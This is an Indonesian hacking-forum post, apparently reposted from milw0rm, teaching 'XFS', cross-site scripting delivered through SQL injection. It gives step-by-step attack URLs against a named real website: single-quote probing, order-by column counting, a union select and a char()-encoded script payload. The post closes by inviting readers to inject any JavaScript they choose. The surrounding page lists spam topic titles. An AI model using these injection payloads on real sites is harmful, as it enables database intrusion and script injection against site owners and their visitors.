Would you like to react to this message? Create an account in a few clicks or log in to continue.



 
IndeksLatest imagesPencarianPendaftaranLogin
Pencarian
 
 

Display results as :
 
Rechercher Advanced Search
Latest topics
» Viagra Generico. prontuario viagra generico
XFS~XSS from SQL-i I_icon_minitimeThu Aug 04, 2011 1:31 pm by Tamu

» Nearly Half Of Residents In Nova Scotia Nursing Homes Display Behavioural Problems
XFS~XSS from SQL-i I_icon_minitimeThu Aug 04, 2011 11:24 am by Tamu

» русские мамки смотреть порно видео
XFS~XSS from SQL-i I_icon_minitimeThu Aug 04, 2011 6:27 am by Tamu

» Compra Viagra. acquistare sildenafil viagra generico
XFS~XSS from SQL-i I_icon_minitimeThu Aug 04, 2011 3:16 am by Tamu

» Compra Viagra. viagra generico acquisto
XFS~XSS from SQL-i I_icon_minitimeThu Aug 04, 2011 12:44 am by Tamu

» free casino online games
XFS~XSS from SQL-i I_icon_minitimeWed Aug 03, 2011 7:30 pm by Tamu

» Can Dogs Take Cough Medicine
XFS~XSS from SQL-i I_icon_minitimeWed Aug 03, 2011 6:14 pm by Tamu

» This forum back up me thanks
XFS~XSS from SQL-i I_icon_minitimeWed Aug 03, 2011 3:32 am by Tamu

» Some websites are starting to look wrong on Chrome?
XFS~XSS from SQL-i I_icon_minitimeTue Aug 02, 2011 6:02 pm by Tamu

Forum
Affiliates
   
milw0rm.com
 
Plankton
 
milw0rm.com
 
echo.or.id/
 

 :: Hacking :: Web attack
 

 XFS~XSS from SQL-i

Go down 
PengirimMessage
bungaputrilanacita




Jumlah posting : 2
Points : 6
Join date : 07.08.09

XFS~XSS from SQL-i Empty
PostSubyek: XFS~XSS from SQL-i   XFS~XSS from SQL-i I_icon_minitimeFri Aug 07, 2009 11:30 am
Begini ceritanya bapak2,.
tadi siang, bunga iseng2 ajah maen ke milw0rm,.udah lama bgt gak maen ke site itu,.baca punya baca,. Very Happy
eh,.ketemu bugs sederhana tapi bahaya juga loh,,kata om s'to ajah xss bisa membobol bank,.mantafkan ,.hehehehe,. (^-^)
nah ini bugs nya:

bugs: XFS (XSS From Sql-i)

dekripsi:
XFS adalah kalo dilihat dari kepanjangannya yach XSS yang dilakukan dari bugs sql-i. Very Happy
hehehe,.ngerti gak???sama kalo gak,.tapi bunga akan coba menjelaskan sejelas-jelasnya,. r0~f>
Error pada website yang terkena bugs sql-i ternyata dapat digunakan untuk menjalankan javascript.
pada hal ini kode javascript dijalankan melalui fungi char(), yang nantinya fungsi ini kan menkonversi kode ASCII ke char,.terus inilah yang nantinya akan menjalankan javascript. (^-^)

XFS kemungkinan dapat berjalan pada situs yang XXS nya telah di patch,.tetapi hal yang wajib adalah site tsb mempunyai bugs SQL-i. )-l

okey bapak2,segitu dulu pembukaannya dari saya,kalo ada yang salah mohon di benarkan dan dimaafkan,karena bunga juga masih belajar . Very Happy

contoh:

langkah 1:
cari website yang mempunyai sql-i,.(kalo lom paham ttg sql-i baca2 di forum ini dah buanyak bgt yang ngebahas itu) Very Happy
target jatuh pada:
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=2

cel vulner:
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=2'
dikasih singel quote,jika error page yang keluar maka web tsb kemungkinan bisa.

cari no ajaib:
setelah di beri singel quote keluar error page,.maka ditambahkan query order by --

http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2%20order%20by%201--

pada order by 1-- angka 1 ditambahkan terus sampe keluar error page lagi,.

http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 order by 1--
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 order by 2--
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 order by 3--
dst...

nah angka terakhir jatuh pada order by 8 --
karena order by 9 -- sudah keluar error pagenya lagi,. Smile
lalu kita mencoba mengeluarkan angka ajaib yang kita sebutkan tadi, querynya union select --
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2%20union%20select%201,2,3,4,5,6,7,8--

nah keluar kan no ajaibnya,.no 2.

langkah 2:
setelah keluar no ajaib, di situ kita akan menjalankan javascriptnya. Sesuai dengan deskripsi XFS diatas, yang di butuhkan adalah fungsi char(), dimana dalam fungsi ini akan mengkonfersi ASCII ke dalam string.
untuk itu dibutuhkan konveter string ke ASCII,.
http://www.piclist.com/techref/ascii.htm ->link conveter string ke ASCII
setelah membuka link tsb maka kita mengubah string ke ASCII, dalam hal ini bunga mengubah
alert('pak dokter web nya anda sakit niy,tolong segra di perbaiki yach, XFS found Bungaputrilanacita') ke dalam ASCII kode. Maka di dapatkan hasil
60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,112,97,107,32,100,111,107,116,101,114,32,119,101,98,32,110,121,97,32,97,110,100,97,32,115,97,107,105,116,32,110,105,121,44,116,111,108,111,110,103,32,115,101,103,114,97,32,100,105,32,112,101,114,98,97,105,107,105,32,121,97,99,104,44,32,88,70,83,32,102,111,117,110,100,32,66,117,110,103,97,112,117,116,114,105,108,97,110,97,99,105,116,97,39,41,60,47,115,99,114,105,112,116,62

langkah 3 :
kita tinggal menjalankan saja javascriptnya sesuai deskripsi di atas:

susunannya:
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2 union select 1,char (ASCII code),3,4,5,6,7,8--

hasilnya:
http://www.idijabar.or.id/seputaridi.php?aksi=detail&id=-2%20union%20select%201,char%20(60,83,67,82,73,80,84,62,97,108,101,114,116,40,39,112,97,107,32,100,111,107,116,101,114,32,119,101,98,32,110,121,97,32,97,110,100,97,32,115,97,107,105,116,32,110,105,121,44,116,111,108,111,110,103,32,115,101,103,114,97,32,100,105,32,112,101,114,98,97,105,107,105,32,121,97,99,104,44,32,88,70,83,32,102,111,117,110,100,32,66,117,110,103,97,112,117,116,114,105,108,97,110,97,99,105,116,97,39,41,60,47,115,99,114,105,112,116,62),3,4,5,6,7,8--

nah jalan kan javascriptnya...
untuk javascriptnya yang mau di jalankan terserah bapak2 saja..di atas hanya contoh saja,.

segitu dulu dari saya, mudah-mudahan dapat dimengerti Very Happy

"Maju IT Indonesia"
salam hangat
Bungaputrilanacita Very Happy


original post: http://milw0rm.com/papers/363
Kembali Ke Atas Go down
 
XFS~XSS from SQL-i
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
 :: Hacking :: Web attack-
Navigasi: